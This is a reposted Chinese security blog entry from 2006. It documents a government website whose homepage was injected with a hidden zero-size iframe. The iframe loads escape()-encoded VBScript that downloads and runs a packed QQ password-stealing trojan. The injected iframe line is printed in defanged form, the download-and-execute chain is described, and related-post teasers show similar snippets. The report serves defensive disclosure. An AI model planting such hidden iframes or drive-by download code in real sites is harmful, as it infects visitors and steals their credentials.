又一个被挂木马的政府网站(第3版)

小灰灰 2024-03-17 09:20 139阅读 0赞

endurer　原创
2006-09-30　第 3版补充瑞星的反应。
2006-09-29　22:34:00 第 2版补充Kaspersky的回复。
2006-09-29　第 1版

该网站首页末被加入代码：
/————
＜iframe src＝hxxp://www.race***swd.com.**/w***m*.htm width＝0 height＝0 frameborder＝0>＜/iframe>
-———-/

hxxp://www.race***swd.com.**/w***m*.htm　　的内容为escape()编码的VBSctipt代码，其功能为利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://www.race***swd.com.**/**1**.exe，保存为 %temp%/asde.exe，并利用Shell.Application 对象的 ShellExecute 方法来运行。

**1**.exe　　采用　tElock 0.80 -> tE!　加壳，文件长度为28,109 字节，Kaspersky 报为 Trojan-PSW.Win32.QQPass.mz，瑞星报为 Trojan.PSW.QQPass.qbe。

发表评论取消回复

表情：

评论列表（有 0 条评论，139人围观）

还没有评论，来说两句吧...

相关阅读

相关一个被挂木马的政府网站

*endurer**　原创 2006-09-21　第**1**版该网站首页被加入代码： /-------- ＜script language="JavaS...

布满荆棘的人生/ 2024年04月20日 11:18/ 0 赞/ 194 阅读

相关 3个网站被挂上的木马出自一家

*endurer**　原创 2006-09-18　第**1**版 **第1个网站** 首页被加入的的代码： /------- ＜iframe src='htx...

小咪咪/ 2024年04月20日 11:17/ 0 赞/ 169 阅读

相关 [09-06] 又一个下载木马的网站（第2版）

*endurer**　原创 2006-09-06　第**2**版 2006-09-02　第**1**版网站 hxxp://www.94l\*\*\*m.com...

痛定思痛。/ 2024年04月20日 11:16/ 0 赞/ 143 阅读

相关又一个下载恶意文件的政府网站

*endurer** 原创 2006-08-22 第**1**版首页有3处地方被加入： /-------- ＜iframe height=0 width=0...

旧城等待，/ 2024年04月20日 11:13/ 0 赞/ 179 阅读

相关又一个被挂木马的政府网站(第3版)

endurer　原创 2006-09-30　第 3版补充瑞星的反应。 2006-09-29　22:34:00 第 2版补充Kaspersky的回复。 2006

小灰灰/ 2024年03月17日 09:20/ 0 赞/ 140 阅读

相关 [10-01]某政府和某中央企业网站被挂的木马升级了(第2版)

endurer　原创 2006-10-01　第 2版补充 Kaspersky的回复。 2006-09-30　第 1版上回发现这两个网站被挂上魔兽网游盗号木马。

柔光的暖阳◎/ 2024年03月16日 19:24/ 0 赞/ 134 阅读

相关某政府网站被挂木马txet.exe/Trojan-PSW.Win32.QQRob.iy

endurer 原创 2007-02-05 第1版网站首页被加入代码： /------ ＜iframe height=0 width=0 src="hxxp:/

灰太狼/ 2024年02月17日 13:47/ 0 赞/ 125 阅读

相关一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站

endurer 原创 2007-01-30 第1版该网站首页被加入代码： /------- ＜IFRAME src="hxxp://\\\.v\\1\8\\

我不是女神ヾ/ 2024年02月17日 13:47/ 0 赞/ 130 阅读

相关一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站

endurer 原创 2006-12-06 第1版该网站首页末被加入代码： /-------- ＜iframe src=hxxp://www.z\z\\\yqr

客官°小女子只卖身不卖艺/ 2024年02月17日 13:44/ 0 赞/ 133 阅读

相关一个会下载 Trojan.DL.Agent.wzr 的政府网站

endurer 原创 2006-10-25 第1版网页首部被两次加入代码： /--------- ＜iframe height＝0 width＝0 src＝"hx

妖狐艹你老母/ 2024年02月05日 17:17/ 0 赞/ 25 阅读